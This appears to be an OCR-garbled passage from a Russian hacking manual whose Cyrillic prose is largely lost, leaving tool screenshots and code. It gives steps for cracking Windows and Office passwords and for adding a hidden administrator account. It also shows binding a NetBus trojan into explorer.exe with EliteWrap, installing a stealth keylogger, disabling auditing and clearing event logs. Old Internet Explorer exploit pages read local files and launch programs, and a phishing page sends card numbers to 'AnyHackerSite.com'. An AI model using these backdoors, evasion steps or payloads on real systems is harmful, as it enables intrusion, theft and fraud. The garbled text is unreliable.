.pwl , , .pwl. Pwltool , . Brute force
( ), .
Password length: From ... ... ( : ... ...)
, ,
. Charset

5.

75

String ( ). SearchPassword ( )
,
(. 5.18).
sword searching

E:\WINDOWS\ALEX.PWL

Number of cached passwords: 0

AutoSave every 10 minutes

BDHHI

Current speed: 0

Total variants: 1 679616

si Searching I Time left.

Variants found: 0
liJ-iin-.

Vli' lMii-J

Puc. 5.18.
, , . 5.17,
.
SmartForce ( ) Repwl (. 5.15) -
,
. , , , ,
, sdyicorljn. , ,
...
, , Dictionary () ,
. - ,
, , . , , , , , ,
.. - .
Repwl ,
.
Client/Server (/), .
Pwltool pwlclnt, Repwl.
, .
- ,
Adv (). Adv () Advanced features ( ),
. 5.19, .

76
*'!

1 ^ Advanced features

liSli3|B' ip sf'I5e^'"T''-5lfdl

Variator| BAS info | Shared Res.. | Mail | PSIorage [ Other | More... |


.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Outlook Express accounts' list

| Close

POP3 Server Name: 'sword-2000.sword.net1


POP3 User Name: 'petia'
POPS Password: Not implemented in demo version
Real User Name: 'Petia'
E-mail address: 'petia@sword-2000.sword.net'
SMTP Server: 'sword-2000.sword.net'
SMTP User Name: 'petia'
SMTP Password: Not implemented in demo version
PStorage List Outlook Express resources
Useforeiqnregistryfiles

'

. 5.19. Repwl

Advanced features ( ) . 5.19,
Pwltool ,
( Mail), Windows (
PStorage), ( RAS Info),
( Other),
.
, , ,
Windows 9x/Me.
- , Windows 2000/XP , , .
!


, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.

5.

77_

- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , - .
.



.
, , - , , . , , Pwltool.
,
,
, (. 1 ). , .
, , , , , ,
,
.

, - , .
, ,
. : , . , ,
,
?

k
, - , , . - ,
, - , , . , , , - ,
, [2].

6.

79^

, - . ,
, ,
? , ,
- , , ,
, .
( Hoover - , ,
, ), ,
.

Windows , , ..
Windows, , Windows,
, FINDSTR
Windows 2000/XP.
, , [3,4] Fondstone Inc., ,
,
-
.

.
,
, , , password, login credit card .
Windows , , ,
FINDSTR, , Windows.

[buck FINDSTR
FINDSTR ,
FINDSTR /?. FINDSTR.
FINDSTR [IB] [/] [/L] [/R] [15] [/I] [/X] [/V] [/N] [/M] [/0] [IP] [/:] [/:]
[/:] [/0:_] [/:] [] [[:][]_[...]]
. FNDSTR /? , :

80

/L

/R

/S

/1

, .

/X

, .

/V

,
.

/N

, ,

/:

- .

/:

/:

/0:__

(
).

[:][]_

FINDSTR.
password :
FINDSTR/S "password" *.txt
, ,
password, :

6.

81

FINDSTR /S "password " *.txt


, , password.
, ,
:
FINDSTR/5/:" " *.txt
, /: .
FINDSTR ,
Windows, . , , [3].

flouck cmpok 6 BinText


BinText foundstone_tools
Foundstone Inc. (http://www.foundstone.com) , - , DLL,
. . 6.1 BinText, - Search (), Filter () Help ().
BinText, :
Search | Filter [ Help
File to scan

|C:\Ti st\testdoc

0 Advanced yiew

| j Browse 1

Time taken : 0.000 sees Text size: 444 bytes (0.43K)

File pos [ Mem pos | ID (Text


000023.. 000023... 0
2}/f
4000024. 000024... 0
(/(:
000026 000026... 0
Administrator
000027.. 00002700 0
A 00002?.. 00002730 0
Normaldot
00002744
0
Administrator
000027..
A 000027.. 00002768 0
Microsoft Word 9.0
Mech&Oralo
A 000036.. 000036... 0
this is every big secret
A 00003?.. 00003700 0
A D0004E. 00004E... 0
MSWordDoc
Word.Document.8
A 00004E. 00004E... 0
Root Entry
U 000048.. 00004801 0
U 000048.. 00004880 0
ITable
U 000043.. 00004SOO 0
Word Document
Ready

ANSI: 46

fio

1
Rsrc: 0

. 6.1. BinText

> Browse () .

82

> Go! (). BinText 3.00


.
Advanced view ( ) (. 6.1).
. 6.1 File pos ( ) ' . Mem pos ( ) , Windows.
ID , . 0 , .
BinText
, Windows , . , . 6.1
Test.doc, MS Word. , , Sword, .
, - ,
, ? ,
. . , .
, , .
. 6.2 BinText, , WinRAR .
/ BinText 3 00
Search | Filler

[ Help

File to scan

|c:\Test\tesl.rar

| | Browse |

13 Advanced yjew
File pos

AiOiraoun

000000... 000000...
000002... 000002...
000002... 000002...
A 000004... 000004...
4000004... 000004...
000004... 000004...
^000005... 00000561
4000006... 000006...
4000007... 000007...
4000006... 00000835
400000A... OOOOOA...
4 OOOOOA... OOOOOA...
400000C... OOOOOC...
Ready

Time token : 0 01 0 sees Text size: 21 A bytes (0 21 K)

| Memjxjs [ ID

(:

Go

3
)
3
3
3
D
3
3
0
0
0
3
0
0

1 1 ANSI: 39

| Text
testdoc
U(C/vOx6
BHpl
J1IKLJ
ncNJ3
)g>RR
D/;Yc
S-{~n
;-k#
olEo.
OVrCzA
v?3J4
f.xwd
B2kJ[
|| Uni: 0

j^

p
1 1 Rsrc: 0

||

II Find | | Save |

Puc. 6.2.

6.

83

, ,
- Test.doc. , Encrypt file names ( ),
. 6.3.
Archiving with password
Enter password

Reenter password for verification

Q Show password
0 Encrypt file names

. 6.. !
, - Test.doc , ,
? BinText

(. . 6.2) Find (). ,
Filter () ,
(. 6.4).
BinText 3 0 0
Search I Filter

I Help

0a

DCR

DLF

0 ' (apostrophe)

0 Space
0Tab
01
0"
0#
0$
0%

0(

0)

0/

00-9
E]

0:

0-

0 +
0 . (comma)
0 - (minus)
0 . (period)

0<

0 A-Z

01

D"

0 - 0 (underscore)
0>
' (backtick)
0 ?
0 a-z
0
0{

Include th<>se characters too

STAGE 2:

Ctear

1 Restore defaults

^STAGES: Essentials -

String size

Min text length

[5

Maxtextlength

[4

1 or more repeated characters

Q Discard strings with

01
0}
0 ~ (tilde)
AAACEEEIrbOOUUOr
D AEIOUB
Q aeiou

0 [
0\

MUST contain these

Puc. 6.4.
Filter () . 6.4 , .

84

Stage 1 - Characters included in the definition of a string ( 1 , )


, .
Stage 2 - String size ( 2 - ) .
Stage 3 - Essentials ( 3 - )
MUST contain these ( )
.
, , . , , , , MS Office - ..
BinText , , W2RK srvinfo.exe
, regdmp.exe,
Windows 2000/XP.
HKEY_LOCALMACHUNE\
SECURITY\POLICY\SECRETS,
Windows, Windows
[4]. Isadump2.exe (http://razor.bindview.com),
LSA Windows,
Isadump2.exe .
, - . , - - MS Office
W i n R A R ?
, .

k

Windows , , .
MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5. ,
, *******. Revelation
SnadBoy (http://www.snadboy.com).

6.

85


, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - Off ice Password
.

flakem OfficePassw/ord 3.5


OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5

.

Word
password.doc,
- ?
, Windows,
password.doc, (. 6.5).
- ,
OfficePassword 3.5 :
> * * OfficePassword (Start * Programs * OfficePassword).

OfficePassword
(. . 6.6).

Password
Enter password to open file
C:\test\password.doc

II
OK

Cancel

Puc. 6.5.
Word
I OfficePasswoid 'DEMO'
File

Tools

Options

Help

Select document
You can also drag-and-diop files from Internet Explorer onto this
window.
> (c) 1998-2001 Vitas Ramanchauskas, LaslBil Software <
http://laslbit.conn
"""DEMO Version1""
Register to upgrade to a full-functional version! |

Puc. 6.6.
OfficePassword

> Select document ( )


Windows MS Office.

86

, Word . ,
MS Word . ,
- OfficePassword 3- .
- , .
> , Select recovery
mode ( ), . 6.7.
(Select recovery mode
Document path: C:\test\passworddoc (Word)
Version
: Word 8.0+
Internal version: 193
v/ord language : Russian (041 9)
Encryption type : Strong
Text size
: 537

-:

rreview

Automatic
OfficePassword automatically selects most suitable rec svery options. Recovery may take a
lot of time (up to several months in case of a long passv ord). About 80% ol all passwords
could be recovered within 48 hours. Use guaranteed re covery otherwise.
User-defined
Adjust settings to optimize search for specific case. (Th s option is for advanced users only.)
Guaranteed recovery
Success is guaranteed! Important: please read the doc jrnentation. Additional fee may apply.
I Click here to learn more

Cancel

| Display help info

Next

Puc. 6.7.
> Select recovery mode ( )
:
Automatic ( ), , Next (), , .
User-defined ( ),
. .

6.

87

Guaranteed recovery ( ), , , ,
.

, , 24-28
, . , , .
> Next ().
, ,
(. 6.8).
OfficePasswoid 'DEMO*
Password found:
'007' (without quotes]
The password has been copied onto the clipboard
Would you like to open the document now?

Yes

No

Puc. 6.8. !
OfficePassword 3.5 ,
, . -. , .
, - ,
.
, , - ,
.

cmpokou ******,
, - ,
, (, ), , ******_
, , , . - , , ,
. ,
.

88

,
, . , , NetBus
( ,
14). . 6.9
Revelation SnadBoy (http://www.snadboy.com) NetBus NetBus.
1

SnadBoy's Revelation

'Circled +' Cursor


Drag to reveal password

| Check For Update |1

About

Exit
I Copy to clipboard

Text of Window Under 'Circled +' Cursor (if available)

007
Status
Revelation active.

Length of available text: 3

Reposition Revelation out of the way when dragging 'circled +'


When minimized, put in System Tray
Destination

111

Jl SWORD-2000
Change Host
-Host information1

Q Always on top
Hide 'How to' instructions

How to
1 ) Left click and drag (while holding down the left mouse button) the 'circled V

2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check
the status light for availability of text.
Bright green = text available (See 'Length of text:' in Status area)
Bright red = no text available

OK

Cancel

Puc. 6.9. NetBus Sword-2000


!
Revelation .
. 'Circled+'Cursor ('+')
SnadBoy's Revelation ( . 6.9
Password ()). Revelation,
Test of Window Under Circles and Cursor (if available) (
( )) (
). . 6.9, 007
NetBus Sword-2000,
( ).

6.

89

( NetBus) , 15
.


- , - , -
, , - .
: .
, 7.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.


- , , , , .
MS-DOS: NET USER < > <> /ADD,
,
NET LOCALGROUP < > < > /ADD,
. . 6.10 .
C:\>net user NewUser 007 /add

|The commend completed successfully.


C:\>net localgroup Administrators NewUser /add

|The commend completed successfully.

Puc. 6.10.
NewUser

90

NewUser
, , .
,
,
.

ABmosazpyska
- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
, , 14 15
, .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.


- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 ,
.
Windows NT/2000/XP, ,
, [ |+|[ Ait |+[[Deiete)
IKS
Windows NT/2000/XP. , IKS
,
.

6.

91

IKS .
Web- iks2k20d.exe , . 6.11.
Si IKS (or Windows 2000 Installation
D Standard Install | p Slsalth Install | D Uninstall j

It's recommended (hot you use Standard Install if this is your first time in using IKS. Just
accept the defaults and click on "Install Now" button. Or you can click on "Read readme.M"
to get familiar with the concept of IKS first.
During a standard installation. 0 program ditectoty will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No file
renaming (stealth features) will take place.

Install Directory;
|C:\Program Files\iks

You need to have administrator rights on this system tor it to install successfully.

If you want to uninstell in the future, just run this program (iksinstall.exe) again, click on the
"Uninstail" tab, then "Uninstall Now" to automatically uninstall the standard installation.

. 6.11. IKS
Install Now ( ) -
. IKS
. , IKS , iks.sys,
- ( Diilvinw - Binary Log Translator for IKS
- settings
.
Use Notepad
0 Fitter Out Arrow Keys
Translate to Text Only
, D Filter Out Ctrl and Alt Keys

Filter Out F1 to F1 2 Keys
D Clear Binary Log Upon Exit
dataview.exe, Filter Out All Other Function Keys
1 El Clear Text Log Upon Exit
. 6.12.

Go! ()
, . . 6.12
,
,
.

Import Binary Log From:


C:\WNNT\iks.dal

Browse...

Save Text Log To:


C:\DOCtJME~1\ADMINri.OOO\LOCALS

I Browse...

Go!

Puc. 6.12.

92

, IKS , . iks.sys KOpeHb_CMCTeMbi/system32/drivers,


( Regedt32 . 6.13).
Registry Editor - (HKEY LOCAL MACHINE on Local Machine]
Registry Edit Tree View Security Options Window
f*"l Gernuwe
-SGpc
-(]i8(M2prl
-SI97DRIVER

Help

_
StaT"RE"GJDWORD"OxF"
Type : REGJDWORD : 0x1

-a IAS

-B ICQ Groupware Sd
-SIISADMIN
-&IMAP4D32
- IMonitor
-C] inetaccs
-t*H Inetlnfo
-Sini910u
^Olnport

. 6.13. Windows

(,
The Cleaner, ).
IKS, Stealth Install
( ) (. 6.11)
- , calc.sys,
(, -
- ).
IKS
. 007 Stealth
Monitor, Web-, , ,
. -
Windows,
- , , notepad.exe.

Sanyck
, -
Windows.
,
, , ,
. , 14 15.

6.

93

Ckpbimue
,
.
, elitewrap.exe
(http://www.holodeck.f9.co.uk/elitewrap), .
,
.
Windows
, elitewrap.exe, a
, .. ,
.
. , ,
calc.exe NBSvr.exe - NetBus.
C:\>elitewrap
eLiTeWrap 1.04 - () Tom "eLite" Mclntyre
tom@holodeck.f9.co.uk
http://www.holodeck.f9.co.uk/elitewrap
Stub size: 7712 bytes
Enter name of output file: explorer.exe
Perform CRC-32 checking? [y/n]:y
Operations:

1 - Pack only
2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously

Enter package file #1: calc.exe


Enter operation: 2
Enter command line: calc
Enter package file #2: nbsvr.exe

94

Enter operation: 3
Enter command line: nbsvr
Enter package file #3:
All done :)
explorer.exe. Windows 2000
explorer.exe, calc.exe
NetBus. , , , ,
NetBus .
, elitewrap.exe , ,
, .
EliteWrap ,

.

, ,
- ,
, ,
. ,
[3], , , - .
- .
.

? ,
, , - . , . ,
, .
, , ,
.

7.

Cokpbimue
- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 ,
50%
, - , , .

, ,
,
. , ,- , , . ,
( ).

, - ( ).
,

. , - , , , .
.

96

acnekma
, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
,
[10], (, )
, - ,
- privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .

. , Web-
, Web, .
, , ,

7.

97

(, ).


, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .

Fu6kue u gucku
. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
(Folder Options) Windows. * (Tools * Folder Options) (. 7.1).
4-1687

98

| | {
- .

:
0 " "

|^|
()
|

-
0

,

. 7.1.
- Word
(Delete) Windows ,
. . 7.2,
, Word,
, ,
.

^3
:- .4^)
&

PGP
I Security
Database
4
131
^ 3,5 (;)
(:)
(3 SJ (:)

3PGP
D Security

^~$
gl~WFU-OD02.lmp
El~WRL0004.tmp
gl~WRL1120.tmp
S~WRL19B2.tmp
gl~WRL3531.tmp
il~WRL4024.tmp

: 10 ( |||350

Puc. 7.2. ,

7.

99

, - ., .WBK, , -$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.

Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmltfClndisk).

nanok
, , ,
. , .

, ,
.
- , , . ( 100%)
.
/

. 7.3 Clean Disk Security 5.01


(http://www.theabsolute.net/sware/index.htmltfClndisk),
, ( ).
Clean Disk Security 5.01
Erase fully ( ).
-
, , ( FAT NTFS).
,
, . Windows, Windows, Temp
( , , ) .
-,
, ,
(cookie). , (. 7.3).

100

. 7.. Clean Disk Security 5.01



. 7.3, :
Simple () 6 ,
.
; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . .
, ( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01
,
,
.
, [10]. -
, : (UPS);

7.

101

. , ,
.
,
.

Onucmka
, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.

. , ,
NTFS.


, ,
, -
. , - - Web- .
, , .
.
, ,
.

, , .

102

. ,
.

, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
,
- ,
!!!

7.

103

Web- ,
HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 7.4,
, Web-,
IP- .
'3 Analyze Your Internet Privacy - Microsoft Internet Explorer

aaa

^ - " < <3 | Si (^


- http://www.privacy.net/analyze/
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All information sent by your web browser when requesting this web page:
Accept: V* Accept-Language: ru Connection: keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:
Date=1/30/2002; Privacy.net=Privacy+Analysis Via: 1.1 cea15, 1.1
proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLES) X-Forwarded-For: 212.9.232.151,
212.9.224.89 Cache-Control: max-age=259200

. 7.4. Web-

, ( )
Whols,
1,
.
, - , IP- . Web-

104

Web- , IP- -
...
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 7.5).
"1 Anonymizar cam Online Privacy Services - Microsoft Internet Explorer

^ * " < <3 | 3t | ^"

Anonymi/er.eomSIGNUP

PRODUCTS & SERVICES

LEARft [About Privacy --

BECOME AN AFFILIATE

NEWS

hj SHOP: | Services/Products

httpi/
i-ojjf

Spy Cop l

i.i. \..f
Prevent backing by Web
sites, hacken and others. Go
* Shieids vour IP address ''.

. 7.5. Web-
Go.

- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .

npokcu-cepBepbi
Web -, - (Proxy server)
(. 7.6).

7.

105

IP-key


,
.

0 -
:

| www.anonymize : I8080

I , . .

:
:

. 7.6. -
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .

106

Cokpbimue amaku
, , , ,
, , , .
, , , 6 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, ,
, .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , ,
elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).

Windows, .
, .
,
, , explorer.exe,

7.

107

Windows
Windows.

, EliteWrap, 6.
( Rootkit ). ,
, .

.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].


, ,
, -
, .
, / .

Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
C:\Auditpobauditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System
Logon
Object Access

= No
= No
= No

108

Privilege Use
Process Tracking

No
= Success and Failure

Policy Change

a No

Account Management

a NO

Directory Service Access

= No

Account Logon

No

//ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).

Omicmka

Windows 2000/XP :
> (Start)
.* (Settings Control Panel).
>- (Control Panel)
(Administrative Tools).
> (Event Viewer).
Event Viewer ( ) (. 7.7).
File

Action

View

Application
\ Security
|HJ System

Help

Event Viewei (Local)


t Type i Description
Log

Application Eiroi Records

L0g

Open Log File...


Save Log File Ai...
New Log View

I Size

512...
ttlll
512...

delete all records in the log

Puc. 7.7. Windows

7.

109

> (Security Log);


.
> Clear all Events ( ). , . 7.8,
.
Event Viewer
Do you want to save "Security" before clearing it?

Yes

Ho

Cancel

Puc: 7.8.
> (No), . .
,
! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, , Windows NT 4,
Windows 2000. .
C:\els004>eisave -s \\ComputerName -

-s , -
. , . elsave /? ,
.
, elsave.exe
. elsave.exe Windows ( (Start), AT MS-DOS). System, .

Ckpbimue ,

, , . - -

110

, , .
.

Cokpbimue
,

(. 7.9).
nc.exe Properties
General | Compatibility f Security j Summary [

Inc.exe

Type of file:

Application

Description:

nc

Location:

C:\testVietcat

Size:

58.0 KB (59.392 bytes)

Size on disk:

60.0 KB (61,440 bytes)

Created:

Sunday, Decembej 22, 2002,1:32:09 PM

Modified:

Saturday, January 03,1998,1:37:34 PM

Accessed:

Today, Decembei 30.2002,12:05:10 PM

Attributes:

Read-only

OK

0 Hidden

Cancel

| Advanced..

Apply

Puc. 7.9. Windows


, , Windows
.

Ckpbimue
,
, Windows. ,
. Windows 2000/XP Documents and Settings\User\Start Menu\Programs\Startup
. , -

7.

111

-
, , .
, Windows
, ,
, , The Cleaner
(http://www.moosoft.com).
, EliteWrap 6.
- .

Pymkumbi
, - UNIX [3]. , , ,
,
. , ,
, .
Windows NT/2000/XP
, ROOTKIT (http://www.rootkit.com)
. , , ..
NTKap, , ACL (,
4), . ,
, , Windows NT/2000/XP
. ROOTKIT COM

. , ....

112

-
( , - ).
, , . , , ,

, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .

3.

XakuHz
-
8.

XakuHg 1/
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
4 ,
, ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , ,
(, ).
, . ,

114

, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992
.
, , . Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web,
HTML (Hyper Text Markup Language -
).
,
: , , ,
- HTML CGI HTTP. ,
.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , -

8. Web

115

, ),
Web Web-.

kog HTML
HTML - Web,
Web,
, , , , , , , , .
, HTML , Web, ,
Internet Explorer (IE) Netscape Navigator (NN).
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.


, DoS , Web . , ,
Web,
, .
(),
JavaScript MainPage.html , HTML
8.1.
8.1.
HTML Web-
<>

<SCRIPT LANGUAGES"JavaScript">

generation^);
function generation() {
var d=0;

while (true) {
a. = new Date;
d = a.getMilliseconds();
window, open ("MainPage.html11, d, "width=250, height=250" );

116

}
</SCRIPT>
</HTML>

IE 5 IE 6
.

HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.


- . , 8.2
... X (
).
8.2.
HTML Web-
<>
<SCRIPT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>

HTML 8.2 IE 5
var p 8.2.

( [3], [10]). , ,
-
HTML .

Sanyck
[3] HTML,
<OBJECT> CLSID (
). 8.3.
HTML, .

8. Web

117

8.3. HTML
<HTML>

DBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000
1

CODEBASE=':\windows\system32\calc.exe >
</OBJECT>
</HTML>

8.3 IE 6 ,
. 8.1.
C:\Documenls and SellingiSAIexSMy DocuroenliW/oik D... |-|||
File

Edit

View

Favorites

Tools

Help

fTlBlfxl

Calculator
Edit

View

Help

Backspace

[ MC
| MR
MS
M*

Opening page

i s

/ jf^iT

W-

| 1/x

t-

|| My Computei

, 8.1. HTML

C:\Windows\system32\calc.exe, , .

Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.

118

8.4.
Web-
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=Il></IFRAME>
<SCRIPT event=NavigateComplete2(b) for=Il>
alert(" :
\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
II.navigate("file://c:/Security.txt");
setTimeout('II.navigate("file://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6
, . 8.2.
"* C:\Documenls and Seltings\Alcx\My DocumenUWoik D... HOD!
File

Edit

View

Favoritet

Tools

Back -

Help
Search

C:\security.txt

I Done

|| jj My Computer

. 8.2. Web-
. 8.2, security.txt -
- Web-. , , - , JavaScript
.
Web- NavigateComplete2,
[3].

8. Web

119


ActiveX ,
HTML- Web- .
Web- , ActiveX, . , Web-,
ActiveX, ActiveX
, .
ActiveX Microsoft - ActiveX ,
ActiveX
(, Verisign Corporation). Web-
, ActiveX - ,
ActiveX.
, ,
, ,
(
http://www.guninski.com), .
- , ActiveX , .
ActiveX ,
http://www.guninski.com. ,
- .

ActiveX
Windows
ActiveX. Web, Web-,
<OBJECT> ActiveX, Windows ActiveX ActiveX, Web.
, ,
ActiveX. - .
ActiveX Windows safe
for scripting ( ),

120

Web. , ActiveX,
,
(Georgi Guninski) . ,
ActiveX, , Scriptlet Eyedog, ,
IE 4.
http://www.guninski.com HTML- ( - , ), Scriptlet , Eyedog
Windows . IE 4 Windows 9x.
Windows 2000/XP ActiveX, , IE 5 IE 6 [3]. , Windows 2000/XP , , , . [3],

- ActiveX
. , , , , .
8.5 HTML,
, ,
. ( HTML
, ,
http://www.guninski.com).
8.5.
<>
<SCRIPT>
alert(" : :\\secret.txt\BaM \ " )
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObjact(":/secret.txt", " h t m l f i l e " ) ' ) ;
setTimeout("alert(x.body.outerHTML);", 2 0 0 0 ) ;
</SCRIPT>
</HTML>

8.5 IE 6 ,
. 8.3.

8. Web

121

iQcAteitVMSScNpt.hlml - Micro.olt Inlecnel Exploiei


File

Edit

View

Favorite!

Toolt

[
jjf

Help

Back > . g] g) | /) Sea,ch

" Links "


0

Microsoft Internet Explorer


^}

[x]

<BODY><PRE>3ro

</PBE></BODY>

OK |

g| Done

||

||

||

Hi My Computer

. 8.3. security.txt
, security.txt ,
security.txt Web-,
,
. , Windows, ,
.
- .
, (cookie),
Web- Web.

kyku
- .
-
, , , ,
- ,
Web.
, - , .
, ,
, SpyNet (. 17),
Web-, .

PEACEFIRE

http://www.peacefire.org/security/iecookies

JavaScript,
,
, . 8.4.

122

"1 Internet Explorer cookies are world-readable - Microsoft Internet Ex..


File

Edit

*-Beck

View

Favorites

Tools

Help

( | CtSearch SiFavorites gJHistory

[Links'

If you have Internet Explorer for Windows, type a domain (e.g. "yahoo.com"
or "hotmail.msn.tom") in the space below, and click to view a page on
Feacefire.org that will display your cookie for that domain:
(You must click the button to submit the domain name hitting Enter will not work)
lMySite.com

Click to view cookie

Or you can go to a demonstration at the following URL, to see a list of information that
is exposed by cookies set from Amazon.com, MP3.com, and other popular sites:
http://www.securitvsoace.cQm/exploit/exploit lc.html (hosted by securitvspace.com')

A
Puc. 8.4.

.
, Web-
,
- . Javascript ,
. , , .
, Web-
http://www.peacefire.org/security/iecookies.
Javascript, Click to view cookie
( ), , ,
. , ,
,
.

flepekpecmHbie
JHTML-,
Web, Web- . Web CGI-,
Web-, .
8.6.
8.6. HTML

<HTML>
<BODY>

8. Web

123

, <
HREF="http://WWW.AnySite.com/cgi/Hacker. 1?=<81>
</81>" </>
</BODY>
</HTML>

Web-
Comment, , ,
. , , , ICQ, - ,
. Web, - .
, . ( CGI- ).

Web-caumoB
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.

124

Web-,
.
Web- ,
. 8.7
HTML, .
8.7. HTML
<HTML>
<HEAD>
<1> Bubliki&Baranki BCE!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE="text/javascript">
function falsifyQ {
z=window.open("about:Internet-Mara3HHBubliki&Baranki");
z.document.openQ;
z.document.write
("<1>

BubHki&Baranki</TITLExHl>3aKa3

VirtualAir</Hl>
<FORM
ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'
=5- =1<>
no4Tbi<BR><INPUT =11>
<><11
TYPE=textxBRxINPUT
TYPE=checkbox
]=>

VirtualAir<P>
<INPUT
TYPE=submit
=''/(>");
z.document.close();
}
</SCRIPT>
<H1 ID="header">ToBap VirtualAir</Hl>
. Bubliki&Baranki VirtualAir, ! <
HREF="javascript:var
a;"
onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com'; return true;" onMouseOut= "window.status="">
, </> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 8.5.

8. Web

125

| '3 RogiKopito ... !


File

Edit

View

Favorite!

Tool.
ft

Help

|/)sea,ch

VirtualAir
Bubliki&Baranki
VirtualAir,
! ,
Bubliki&Baranki! ^

4 hllpVAvww.BublilABaianki.com

> Compute!

. 8.5. Web- Rog&Kopito


http://www.Bubliki&Baranki.com -
Rog&Kopito . Web- Rog&Kopito

Bubliki&Baranki, Web- Rog&Kopito
. (, ,
.) , Web-
Bubliki&Baranki. Web-, . 8.6.
3 BublikilBaianki - Miciosof...M ' ~J
File

Edit

View

Favorites

Toolt

Help

[ C) IP Seaich
Address ] 1:111-Bubliki&Baianki--

VirtualAir




VirtualAir

Done

|| My Computel

J3

. 8.6. Web- VirtualAir


Bubliki&Baranki

126

Web- . 8.6
.
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FORMACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'METHOD=post>

-
(Address) ,
,
, , .
IE Address Javascript.
